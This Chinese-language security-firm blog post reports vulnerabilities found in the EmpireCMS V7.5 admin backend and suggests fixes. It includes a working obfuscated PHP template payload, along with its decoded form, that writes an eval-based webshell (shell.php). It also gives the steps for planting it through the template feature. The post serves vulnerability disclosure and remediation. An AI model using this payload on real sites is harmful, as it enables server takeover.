網站安全檢測 對帝國CMS程式碼的後臺功能性安全測試
最近我們SINE安全在對帝國CMS系統進行程式碼安全審計的時候,發現該系統存在網站漏洞,受影響的版本是EmpireCMS V7.5,從帝國官方網站下載到本地,我們人工對其程式碼進行詳細的漏洞檢測與安全程式碼分析。共計發現三個高危漏洞,都是在網站的後臺管理頁面上的功能發現的。該漏洞的產生,最根源的問題是沒有對get,post提交方式進行嚴格的安全效驗與過濾,導致可以插入惡意程式碼到後端伺服器中去處理,導致漏洞的發生。
帝國CMS系統,簡單給大家介紹一下,目前很多站長,以及企業建站,都在使用該套系統,快速,便捷,易於搜尋引擎收錄,採用的是B/S架構開發,php語言+Mysql資料庫,支援大併發同時訪問,可以承載較多的使用者快速的訪問網站的各個頁面與內容,模板自定義化,可以設定標籤與自行設計網站外觀,靜態html生成,還有采集功能,深受廣大站長和網站運營者的喜歡。
我們SINE安全技術在對該程式碼進行安全檢測與滲透測試的手,會先大體看下程式碼,熟悉整個網站的架構,資料庫配置檔案,以及入口呼叫到的檔案,通常呼叫到的安全規則是如何寫的,多個方面去大體的瞭解該程式碼,目前滲透測試中,發現的網站漏洞有:SQL隱碼攻擊漏洞,網站敏感資訊洩露,初始化安裝功能漏洞,直行平行越權邏輯漏洞,任意檔案上傳漏洞,登入繞過漏洞,簡訊驗證碼漏洞,找回密碼漏洞,資料庫備份webshell,XSS跨站,CSRF漏洞等待。
首先我們檢測到的是帝國安裝程式碼功能上存在可以插入惡意程式碼漏洞,在install安裝目錄下的index.php檔案中,可以查到表的字首,也就是獲取前端提交過來的引數,然後繼續往下看,data目錄下的fun.php程式碼裡的引數並沒有做任何的安全效驗,導致可以直接插入惡意程式碼寫入到配置檔案config.php中去。漏洞詳情如下圖:
後臺還存在get webshell漏洞,開啟後臺管理功能頁面,選擇管理首頁模板,緊接著右鍵點選增加首頁方案中,複製漏洞exp程式碼:<?php $aa = _decode(ZWNobyAnPD9waHAgZXZhbCgkX1JFUVVFU1RbaHBdKTsnPnNoZWxsLnBocA)${(system)($aa)};?> 解密後是:ZWNobyAnPD9waHAgZXZhbCgkX1JFUVVFU1RbaHBdKTsnPnNoZWxsLnBocA=>echo '<?php eval($_REQUEST[hp]);'>shell.php
寫到模板內容頁面裡,左鍵點選提交,再點選啟用此方案,就在會e/admin/template/資料夾下生成一個shell.php檔案。
關於帝國CMS漏洞的修復辦法,對所有的get,post請求做安全過濾,也可以直接在eaddslashes2的引數裡增加惡意程式碼的攔截機制,先檢測後放行,該漏洞的利用條件是需要有後臺管理員許可權,利用的不是太多,建議對網站後臺的管理目錄進行更改,或者直接將管理員的密碼設定的複雜一些。如果您對網站漏洞修復不是太懂的話,也可以找專業的網站安全公司來處理,國內SINE安全,啟明星辰,綠盟,都是比較不錯的,網站漏洞經常出現,也請網站的運營者多多關注EmpireCMS的官方,一有補丁就立即修復掉,將安全損失降到最低。
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/31542418/viewspace-2656504/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- 滲透測試公司 對PHP網站安全後門檢測PHP網站
- 網站滲透測試安全檢測漏洞網站
- 網站滲透測試安全檢測方案網站
- 用測試網站來檢測安全級別(轉)網站
- 網站安全滲透測試檢測認證登入分析網站
- 滲透測試網站安全漏洞檢測大體方法網站
- 網站安全維護對公司網站滲透測試剖析網站
- 織夢DEDECMS網站後臺安全檢測提示 加一個開關網站
- 網站安全測試之APP滲透測試漏洞網站APP
- 網站安全測試工具GoLismero網站Go
- 安全及效能測試工具(網站收集)網站
- 測試CMS同步測試CMS同步測試CMS同步
- 滲透測試 網站安全測試行業問題分析網站行業
- 微信小程式之滲透測試、加固、安全檢測微信小程式
- 程式碼安全測試第十五期:跨站指令碼漏洞指令碼
- 蘋果測試 Safari 對 HTTP 網站顯示不安全警告蘋果HTTP網站
- 滲透測試對檔案包含漏洞網站檢測網站
- 網站漏洞檢測 滲透測試檢測手法網站
- 帝國CMS後臺登陸驗證碼不顯示的解決方法
- 網站安全漏洞測試對抓包嗅探埠講解網站
- 程式碼安全測試方法有什麼?網路安全知識學習
- 網站安全公司 滲透測試運營之路網站
- 網站安全評估滲透測試手法分析網站
- 網站安全滲透測試公司心得總結網站
- 什麼是網站系統安全的滲透檢測?網站
- 網站安全公司 滲透測試中的漏洞資訊蒐集網站
- 對泛微OA系統的網站安全檢測以及漏洞修復辦法網站
- 軟體為什麼要進行安全測試?可做安全測試的軟體檢測公司安利
- 網站漏洞檢測對漏洞檢測修復方案網站
- 網站介面漏洞安全測試 大體階段分析網站
- 滲透測試網站安全基礎點講解網站
- 滲透測試公司談網站安全評估方法網站
- 軟體測試與程式碼安全詳解
- 網路安全滲透測試
- 有了這4個安全測試工具,對軟體安全測試say so easy!
- 帝國CMS核心線上聽小說聽書網原始碼原始碼
- 程式碼安全測試第三期:路徑遍歷漏洞的防範與檢測
- 自動化測試新視角:以SaaS模式檢測內網安全模式內網